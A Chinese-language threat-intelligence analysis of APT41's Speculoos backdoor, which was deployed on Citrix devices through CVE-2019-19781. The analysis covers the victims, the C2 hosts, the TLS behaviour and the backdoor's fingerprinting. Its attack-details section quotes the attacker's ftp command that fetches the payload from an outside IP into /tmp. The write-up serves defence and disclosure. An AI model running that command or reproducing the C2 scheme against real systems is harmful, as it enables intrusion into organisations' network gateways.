FireEye在2020年3月25日發(fā)布了一份關于APT41全球攻擊活動的報告。此攻擊活動發(fā)生在1月20日至3月11日期間,主要對Citrix,Cisco和Zoho網(wǎng)絡設備進行攻擊。研究人員根據(jù)WildFire和AutoFocus數(shù)據(jù)獲得了針對Citrix設備的攻擊樣本‘Speculoos’,還確定了北美,南美和歐洲等世界各地多個行業(yè)的受害者。
Speculoos的基于FreeBSD實現(xiàn)的,共識別出五個樣本,所有樣本文件大小基本相同,樣本集之間存在微小差異。Speculoos利用CVE-2019-19781進行攻擊傳播,CVE-2019-19781影響Citrix Application Delivery Controller,Citrix gateway和Citrix SD-WAN WANOP等設備,允許攻擊者遠程執(zhí)行任意命令。
攻擊細節(jié)
攻擊者利用CVE-2019-19781遠程執(zhí)行命令:’/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@ 66.42.98[.]220/
第一波攻擊始于2020年1月31日晚上,使用的文件名為bsd,影響了美國的多個高等教育機構,美國醫(yī)療機構和愛爾蘭咨詢公司。第二波攻擊始于2020年2月24日,使用文件名為un,影響了哥倫比亞高等教育機構,奧地利制造組織,美國高等教育機構以及美國的州政府。
基于BSD系統(tǒng)的惡意軟件相對少見,此工具和特定Citrix網(wǎng)絡設備有關,因此Speculoos很可能是APT41組織專為此攻擊活動研發(fā)的。
二進制分析
在FreeBSD系統(tǒng)上可以運行使用GCC 4.2.1編譯的ELF可執(zhí)行文件Speculoos后門。 該負載無法保持持對目標持久控制,因此攻擊者會使用額外的組件或其他攻擊手段維持控制。執(zhí)行后門后,會進入循環(huán),該循環(huán)通過443端口與C2域通信,并調用函數(shù)
alibaba.zzux[.]com (119.28.139[.]120)
當通信出現(xiàn)問題時,Speculoos會通過443端口嘗試連接到備用C2服務器,其IP地址為119.28.139[.]20。如果連接到任一C2服務器,它將與服務器進行TLS握手。 圖1顯示了發(fā)送到C2服務器的數(shù)據(jù)包。
它請求login.live [.] com作為Server Name Indication(SNI)。
成功連接到C2并完成TLS握手后,Speculoos將對目標系統(tǒng)進行指紋識別,并將數(shù)據(jù)發(fā)送回C2服務器。其結構如下表1所示。
數(shù)據(jù)通過TLS通道發(fā)送,并且Speculoos會等待服務器的兩字節(jié)響應。在收到回應后,它會發(fā)送一個字節(jié)(0xa)到C2,并進入循環(huán)以等待命令。 表2為攻擊者可執(zhí)行命令, 可讓攻擊者完全控制受害者系統(tǒng)。
研究中分析的兩個Speculoos樣本在功能上相同,兩者之間只有八個字節(jié)不同,在收集系統(tǒng)信息時‘hostname‘和‘uname -s’命令不同導致。uname -s返回內核信息,hostname返回主機系統(tǒng)名稱。 下圖顯示了兩個Speculoos樣本之間的二進制比較。
影響評估
互聯(lián)網(wǎng)可訪問設備允許未經(jīng)授權的用戶遠程執(zhí)行代會帶來很大的安全問題,CVE-2019-19781影響了多個面向互聯(lián)網(wǎng)的設備,攻擊者積極利用此漏洞來安裝自定義后門。攻擊者可以監(jiān)視或修改整個組織的網(wǎng)絡活動,因為所有受影響的組織的網(wǎng)絡活動都必須通過這些網(wǎng)絡設備進行。
默認情況下通過這些設備可以直接訪問組織系統(tǒng)內部,攻擊者無需考慮內部網(wǎng)絡橫向移動的問題。網(wǎng)絡攻擊者有幾種手段攻擊,例如改變網(wǎng)絡數(shù)據(jù)、注入惡意代碼、實施中間人攻擊或將用戶引誘到虛假登錄頁面以竊取登錄信息。
